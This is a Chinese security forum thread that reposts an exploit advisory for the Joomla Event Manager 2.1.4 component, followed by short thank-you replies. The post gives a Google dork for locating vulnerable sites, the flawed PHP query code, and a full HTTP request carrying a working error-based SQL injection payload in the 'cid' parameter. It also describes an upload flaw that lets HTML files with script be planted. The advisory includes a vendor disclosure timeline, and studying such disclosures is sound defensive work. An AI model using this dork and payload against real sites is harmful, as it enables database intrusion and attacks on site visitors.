查看: 31661|回复: 82

Joomla Event Manager 2.1.4 - Multiple Vulnerabilities

[复制链接]
发表于 2015-8-16 11:14:23 | 显示全部楼层 |阅读模式
# Google Dork:
  1. inurl:option=com_jem
复制代码

# Date: 08-12-2015
# Author: Martino Sani
# Vendor Homepage: www.joomlaeventmanager.net
# Software Link: www.joomlaeventmanager.net/download?download=50:jem-2-1-4-stable
# Version: 2.1.4
# CVE: -
  
# VULNERABILITIES
  
##1 SQL Injection
  
  Resource: index.php?option=com_jem&view=myevents
  Parameter: cid
  
  Authenticated user can execute arbitrary SQL queries via SQL injection in the functionality that allows to publish/unpublish an event.
[HTML] 纯文本查看 复制代码
# Exploit Title: Joomla Event Manager 2.1.4 - Multiple Vulnerabilities
  
### Source Code
  
  File: sites/models/myevents.php
  
  function publish($cid = array(), $publish = 1)
  {
     if (is_array($cid) && count($cid)) {
        $cids = implode(',', $cid);
    
        $query = 'UPDATE #__jem_events'
      . ' SET published = '. (int) $publish
      . ' WHERE id IN ('. $cids .')'
      . ' AND (checked_out = 0 OR (checked_out = ' .$userid. '))';
            
        $this->_db->setQuery($query);
     }
  }
  
### PoC
  
  POST /joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151 HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: [url]http://127.0.0.1/joomla3.4.3/index.php?option=com_jem&view=myevents&Itemid=151[/url]
  Cookie: 55cfbe406ffe44b0159d9a943820d207=gauuoq0rqlakkltqj4dd1mpd76; jpanesliders_stat-pane=0; jpanesliders_event-sliders-10=2; d6300469df4ad94ccc019d02bc74f647=4339lu3g2tn4lhg2lvgd8ft263
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 352
    
  filter=1&filter_search=&limit=10&cid%5B%5D=1,2)%20AND%20(SELECT%206959%20FROM(SELECT%20COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20AND%20(1577=1577&filter_order=a.dates&filter_order_Dir=&enableemailaddress=0&boxchecked=1&task=myevents.unpublish&option=com_jem&5c597c6e06b1d6627024f147b562ecaf=1
  
-------------------------------------------------------------------------------------------
  
##2 Insecure File Upload
  
  Default JEM settings allows to upload HTML/HTM files as event's attachment.
  An authenticated attacker could upload malicious HTML/HTM files with malicious code (e.g. Javascript).
  These attachments could be reachable on "<website>/media/com_jem/attachments/event/event[id]/" or downloaded and executed locally by the victim's browser.
  
  Attachments process is handled by "/site/classes/attachments.class.php" file.
  File types allowed by default are in the "/admin/sql/install.mysql.utf.sql" file.
  
-------------------------------------------------------------------------------------------
  
# NOTES
  
  08-01-2015: Vendor notification.
  08-12-2015: Vendor fixes the issues in the development branch.
  
  The author is not responsible for the misuse of the information provided in this security advisory.
回复

使用道具 举报

发表于 2015-8-16 12:41:36 | 显示全部楼层
摩西摩西??是HT里面的吗
????
回复 支持 反对

使用道具 举报

发表于 2015-8-16 13:25:49 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

发表于 2015-8-17 14:49:09 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2015-8-17 20:34:53 | 显示全部楼层
学习学习技术,加油!
回复 支持 反对

使用道具 举报

发表于 2015-8-18 22:16:08 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2015-8-19 08:32:23 | 显示全部楼层
支持,看起来不错呢!
回复 支持 反对

使用道具 举报

发表于 2015-8-20 14:56:13 | 显示全部楼层
感谢楼主的分享~
回复 支持 反对

使用道具 举报

发表于 2015-8-20 20:26:41 | 显示全部楼层
感谢楼主的分享~
回复 支持 反对

使用道具 举报

发表于 2015-8-21 01:28:48 | 显示全部楼层
学习学习技术,加油!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 03:52 , Processed in 0.024313 second(s), 11 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部